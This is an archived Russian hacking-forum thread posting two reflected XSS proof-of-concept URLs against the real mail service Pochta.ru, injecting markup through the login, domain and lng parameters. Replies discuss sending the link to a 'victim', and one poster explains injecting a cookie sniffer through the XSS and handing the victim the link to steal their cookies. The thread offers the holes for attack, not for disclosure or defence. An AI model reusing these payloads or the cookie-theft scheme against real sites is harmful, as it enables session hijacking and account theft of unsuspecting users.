PDA

Просмотр полной версии : 2 XSS(passive) на Pochta.ru


_kREveDKo_
01.05.2006, 21:52
http://old.pochta.ru/forgot.php?&lng=ru&login="><h1>XSS</h1>&domain=pochta.ru"><h1>XSS</h1>

http://www.pochta.ru/?lng=en"><h1>XSS</h1>

nike57
06.05.2006, 13:50
http://old.pochta.ru/forgot.php?&lng=ru&login="><h1>XSS</h1>&domain=pochta.ru"><h1>XSS</h1>

http://www.pochta.ru/?lng=en"><h1>XSS</h1>
Это надо "жертве" отправить или что?

vectorg
06.05.2006, 14:01
Это надо "жертве" отправить или что?
Это надо "жертве" ВПАРИТЬ :D
т.е. через xss внедряешь сниффер, даёшь "жертве" ссылку, берёшь куки